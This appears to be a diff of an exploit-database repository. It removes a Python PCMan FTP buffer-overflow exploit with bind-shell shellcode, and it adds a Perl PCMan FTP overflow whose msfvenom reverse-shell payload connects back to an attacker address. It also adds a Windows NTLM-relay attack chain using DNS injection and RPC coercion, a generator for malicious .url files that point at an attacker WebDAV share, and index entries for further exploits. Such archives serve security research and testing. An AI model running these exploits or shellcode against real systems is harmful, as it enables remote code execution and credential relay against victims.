+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
+
+--
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstorm.news/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>

exploits/windows/remote/26471.NA

@@ -1,129 +0,0 @@
-#!/usr/bin/env python
-
-import signal
-from time import sleep
-from socket import *
-from sys import exit, exc_info
-
-#
-# Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
-# Discovered and Reported******June 2013
-# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
-# Exploit/Advisory*************http://infosec42.blogspot.com/
-# Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)
-# Tested Commands*************USER (Other commands were not tested and may be vulnerable)
-# CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending
-#
-
-
-def sigHandle(signum, frm): # Signal handler
-
-    print "\n[!!!] Cleaning up the exploit... [!!!]\n"
-    sleep(1)
-    exit(0)
-
-
-def targServer():
-
-    while True:
-        try:
-            server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n\n>"))
-            server = inet_ntoa(server)
-            break
-        except:
-            print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
-            sleep(1)
-            continue
-
-    return server
-
-
-def main():
-
-    print ("""\n [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
- [*] Discovered and Reported******June 2013
- [*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
- [*] Exploit/Advisory*************http://infosec42.blogspot.com/
- [*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)
- [*] Tested Commands*************USER (Other commands were not tested and may be vulnerable)
- [*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""")
-    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
-    victim = targServer()
-    port = int(21)
-    Cmd = "USER " #Vulnerable command
-    JuNk = "\x42" * 2004
-    # KERNEL32.dll 7CA58265 - JMP ESP
-    ret = "\x65\x82\xA5\x7C"
-    NOP = "\x90" * 50
-
-    #348 Bytes Bind Shell Port TCP/4444
-    #msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R |
-    #msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1" R
-    shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
-    shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
-    shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
-    shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
-    shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
-    shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
-    shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
-    shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
-    shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
-    shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
-    shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
-    shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
-    shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
-    shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
-    shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
-    shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
-    shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
-    shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
-    shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
-    shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
-    shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
-    shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
-    shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
-    shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
-    shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"
-
-    sploit = Cmd + JuNk + ret + NOP + shellcode
-    sploit += "\x42" * (2992 - len(NOP + shellcode)) + "\r\n"
-
-    try:
-        print "\n [*] Creating network socket."
-        net_sock = socket(AF_INET, SOCK_STREAM)
-    except:
-        print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
-        sleep(1)
-        exit(0)
-
-    try:
-        print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port)
-        net_sock.connect((victim, port))
-    except:
-        print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
-        sleep(1)
-        exit(0)
-
-    try:
-        print """ [*] Attempting to exploit the FTP USER command.
- [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
- [*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
-        net_sock.send(sploit)
-        sleep(1)
-    except:
-        print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
-        sleep(1)
-        exit(0)
-
-    try:
-        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
- [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
-        net_sock.close()
-    except:
-        print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
-        sleep(1)
-        exit(0)
-
-
-if __name__ == "__main__":
-    main()

exploits/windows/remote/52326.txt

@@ -0,0 +1,72 @@
+# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
+# Date: 04/17/2025
+# Exploit Author: Fernando Mengali
+# Vendor Homepage: http://pcman.openfoundry.org/
+# Software Link:
+https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
+# Version: 2.0.7
+# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
+Service Pack 2)
+# CVE: CVE-2025-4255
+
+# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
+EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
+#offset: 2007
+#badchars: \x00\x0a\x0d
+#EIP: 0x74e32fd9 (JMP ESP)
+
+my $buf =
+"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
+"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
+"\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" .
+"\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" .
+"\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" .
+"\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" .
+"\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" .
+"\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" .
+"\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" .
+"\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" .
+"\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" .
+"\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" .
+"\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" .
+"\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" .
+"\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" .
+"\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" .
+"\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" .
+"\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" .
+"\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" .
+"\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" .
+"\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" .
+"\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" .
+"\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" .
+"\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" .
+"\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" .
+"\x17";
+
+
+# Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)
+
+my $sock = IO::Socket::INET->new(
+    PeerAddr => "192.168.176.131",
+    PeerPort => "21",
+    Proto    => 'tcp',
+) or die "Cannot connect to 192.168.176.131:21: $!\n";
+
+my $offset = "A"x2007;
+my $eip = "\xd9\x2f\xe3\x74";
+my $nops = "\x90"x20;
+my $payload = $offset . $eip . $nops . $buf;
+my $r = <$sock>;
+print $sock "USER anonymous\r\n";
+$r = <$sock>;
+print $r;
+sleep(1);
+print $sock "PASS anonymous\r\n";
+$r = <$sock>;
+print $r;
+sleep(1);
+print $sock "RMD $payload\r\n";
+$r = <$sock>;
+print $r;
+sleep(1);
+close($sock);

exploits/windows/remote/52330.py

@@ -0,0 +1,121 @@
+#!/usr/bin/env python3
+# Exploit Title:  Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
+# Author: Mohammed Idrees Banyamer
+# Instagram: @banyamer_security
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-06-13
+# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
+# CVE: CVE-2025-33073
+# Type: Remote
+# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
+# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
+# User Interaction: Required (authenticated domain user)
+# Remediation Level: Official Fix Available
+#
+# Affected Versions:
+# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
+# - Windows Server 2022 (including 23H2 editions)
+# - Windows Server 2019
+# - Windows 10 versions from 1507 up to 22H2
+# - Windows Server 2016 and 2008 (with appropriate versions)
+#
+# Description:
+# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
+# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
+# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
+# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
+# Windows Server 2022, and earlier versions vulnerable to this method.
+#
+#
+# Note: The exploit requires the victim to be an authenticated domain user and the environment
+# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
+#
+# DISCLAIMER: For authorized security testing and educational use only.
+
+import argparse
+import subprocess
+import socket
+import time
+import sys
+
+def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
+    print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
+    cmd = [
+        "samba-tool", "dns", "add", dns_ip, dc_fqdn,
+        record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
+    ]
+    try:
+        subprocess.run(cmd, check=True)
+        print("[+] DNS record successfully added.")
+    except subprocess.CalledProcessError:
+        print("[!] Failed to add DNS record. Check credentials and connectivity.")
+        sys.exit(1)
+
+def check_record(record_name):
+    print("[*] Verifying DNS record propagation...")
+    for i in range(10):
+        try:
+            result = socket.gethostbyname_ex(record_name)
+            if result and result[2]:
+                print(f"[+] DNS record resolved to: {result[2]}")
+                return True
+        except socket.gaierror:
+            time.sleep(2)
+    print("[!] DNS record did not propagate or resolve.")
+    return False
+
+def start_ntlmrelay(target):
+    print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
+    try:
+        subprocess.Popen([
+            "impacket-ntlmrelayx", "-t", target, "--no-smb-server"
+        ])
+        print("[*] NTLM relay server started.")
+    except Exception as e:
+        print(f"[!] Failed to start NTLM relay server: {e}")
+        sys.exit(1)
+
+def trigger_coercion(victim_ip, fake_host):
+    print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
+    cmd = [
+        "rpcping",
+        "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
+        "-s", fake_host,
+        "-e", "1234",
+        "-a", "n",
+        "-u", "none",
+        "-p", "none"
+    ]
+    try:
+        subprocess.run(cmd, check=True)
+        print("[+] Coercion RPC call sent successfully.")
+    except subprocess.CalledProcessError:
+        print("[!] RPC coercion failed. Verify victim connectivity and service status.")
+        sys.exit(1)
+
+def main():
+    parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
+    parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
+    parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
+    parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
+    parser.add_argument("--target", required=True, help="Target system to relay authentication to")
+    parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
+    args = parser.parse_args()
+
+    record = "relaytrigger"
+    fqdn = f"{record}.{args.dc_fqdn}"
+
+    inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
+    if not check_record(fqdn):
+        print("[!] DNS verification failed, aborting.")
+        sys.exit(1)
+
+    start_ntlmrelay(args.target)
+    time.sleep(5)  # Wait for relay server to be ready
+
+    trigger_coercion(args.victim_ip, fqdn)
+
+    print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")
+
+if __name__ == "__main__":
+    main()

exploits/windows/remote/52334.NA

@@ -0,0 +1,62 @@
+Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
+Date: June 2025
+Author: Dev Bui Hieu
+Tested on: Windows 10, Windows 11
+Platform: Windows
+Type: Remote
+CVE: CVE-2025-33053
+
+Description:
+This exploit leverages the behavior of Windows .URL files to execute a
+remote binary over a UNC path. When a victim opens or previews the .URL
+file (e.g. from email), the system may automatically reach out to the
+specified path (e.g. WebDAV or SMB share), leading to arbitrary code
+execution without prompt.
+
+```bash
+python3 gen_url.py --ip 192.168.1.100 --out doc.url
+```
+
+import argparse
+
+def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
+    content = f"""[InternetShortcut]
+URL={url_target}
+WorkingDirectory={working_directory}
+ShowCommand=7
+IconIndex={icon_index}
+IconFile={icon_file}
+Modified={modified}
+"""
+    with open(output_file, "w", encoding="utf-8") as f:
+        f.write(content)
+    print(f"[+] .url file created: {output_file}")
+
+def main():
+    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
+
+    parser.add_argument('--out', default="bait.url", help="Output .url file name")
+    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
+    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
+    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
+                        help="Target executable path on victim machine")
+    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
+                        help="Icon file path")
+    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
+    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")
+
+    args = parser.parse_args()
+
+    working_directory = fr"\\{args.ip}\{args.share}\\"
+
+    generate_url_file(
+        output_file=args.out,
+        url_target=args.exe,
+        working_directory=working_directory,
+        icon_file=args.icon,
+        icon_index=args.index,
+        modified=args.modified
+    )
+
+if __name__ == "__main__":
+    main()

files_exploits.csv

@@ -5208,6 +5208,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,,2021-06-10,2021-10-28,0,,,,,,
 38634,exploits/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",remote,ios,,2013-07-09,2015-11-05,1,,,,,,https://www.securityfocus.com/bid/61081/info
 34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",remote,ios,,2014-08-24,2014-08-24,0,OSVDB-110474;OSVDB-110446;OSVDB-110445,,,,,
+52333,exploits/ios/remote/52333.py,"AirKeyboard iOS App 1.0.5 - Remote Input Injection",2025-06-15,"Chokri Hammedi",remote,ios,,2025-06-15,2025-06-15,0,CVE-n/a,,,,,
 42996,exploits/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",remote,ios,,2017-10-17,2017-10-17,1,CVE-2017-7115,,OneRing,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3
 42784,exploits/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",remote,ios,,2017-09-25,2017-09-27,1,CVE-2017-11120,"Out Of Bounds",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
 39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios,,2014-03-10,2015-12-28,1,CVE-2013-6835;OSVDB-104272,,,,,https://www.securityfocus.com/bid/66108/info
@@ -10549,6 +10550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple,,2004-01-28,2012-12-23,1,CVE-2004-2134;OSVDB-20189,,,,,https://www.securityfocus.com/bid/9515/info
 21283,exploits/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,local,multiple,,2002-02-07,2012-09-12,1,CVE-2002-1731;OSVDB-27079,,,,,https://www.securityfocus.com/bid/4059/info
 43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2017-18016,,,,,https://github.com/tintinweb/pub/tree/352d69d518b9b9c0f4983f1254418f0e9755cbb2/pocs/cve-2017-18016
+52329,exploits/multiple/local/52329.py,"Parrot and DJI variants Drone OSes - Kernel Panic Exploit",2025-06-15,"Mohammed Idrees Banyamer",local,multiple,,2025-06-15,2025-06-15,0,CVE-2025-37928,,,,,
 16307,exploits/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,local,multiple,,2010-09-20,2016-10-27,1,CVE-2009-2261;OSVDB-54966,"Metasploit Framework (MSF)",,,http://www.exploit-db.compeazip-2.6.1.WINDOWS.exe.zip,
 22272,exploits/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",local,multiple,,2002-02-22,2012-10-27,1,,,,,,https://www.securityfocus.com/bid/6909/info
 7503,exploits/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass",2008-12-17,"Amir Salmani",local,multiple,,2008-12-16,,1,OSVDB-53573,,,,,
@@ -12386,6 +12388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
 52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
+52335,exploits/multiple/webapps/52335.py,"Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI",2025-06-15,"Cristian Branet",webapps,multiple,,2025-06-15,2025-06-15,0,CVE-2025-49619,,,,,
 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
 49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
@@ -14238,7 +14241,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
 5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
-52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,,
+52327,exploits/php/webapps/52327.txt,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-06-15,/bin/neko,webapps,php,,2025-06-15,2025-06-15,0,CVE-2025-46041,,,,,
 37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
 26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
 27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
@@ -22953,6 +22956,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",webapps,php,,2011-07-13,2012-10-28,1,,,,,,
 26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",webapps,php,,2005-11-17,2013-07-02,1,CVE-2005-3695;OSVDB-20908,,,,,https://www.securityfocus.com/bid/15485/info
 52099,exploits/php/webapps/52099.py,"Litespeed Cache 6.5.0.1 - Authentication Bypass",2025-03-28,"Caner Tercan",webapps,php,,2025-03-28,2025-04-13,0,CVE-2024-44000,,,,,
+52328,exploits/php/webapps/52328.py,"Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation",2025-06-15,"Milad karimi",webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-28000,,,,,
 11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,webapps,php,,2010-02-18,2010-08-31,1,OSVDB-62449,,,,http://www.exploit-db.comlsws-4.0.12-std-i386-linux.tar.gz,
 49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,,2021-02-05,2021-02-05,0,,,,,,
 25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",webapps,php,,2005-06-03,2013-05-28,1,,,,,,https://www.securityfocus.com/bid/13850/info
@@ -26362,6 +26366,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17309,exploits/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",webapps,php,,2011-05-20,2011-05-20,0,,,SOS-11-007.zip,,,http://www.senseofsecurity.com.au/advisories/SOS-11-007.pdf
 13747,exploits/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,webapps,php,,2010-06-05,,1,,,,,,
 11323,exploits/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",webapps,php,,2010-02-02,,1,OSVDB-62088;CVE-2010-0631,,,,,
+52331,exploits/php/webapps/52331.py,"PHP CGI Module 8.3.4 - Remote Code Execution (RCE)",2025-06-15,İbrahimsql,webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-4577,,,,,
 14425,exploits/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",webapps,php,,2010-07-20,2010-07-27,1,,,,,http://www.exploit-db.comphp_chat_for_123flashchat.zip,
 34078,exploits/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,webapps,php,,2010-06-02,2014-07-16,1,,,,,,https://www.securityfocus.com/bid/40532/info
 18210,exploits/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,webapps,php,,2011-12-07,2011-12-07,1,OSVDB-78091,,,,,
@@ -41052,6 +41057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows,,2011-11-07,2011-11-07,1,CVE-2011-0105;OSVDB-71765;MS11-021,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-11-121/
 18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,,
 40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,,
+52332,exploits/windows/local/52332.txt,"Microsoft Excel Use After Free - Local Code Execution",2025-06-15,nu11secur1ty,local,windows,,2025-06-15,2025-06-15,0,CVE-2025-27751,,,,,
 50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
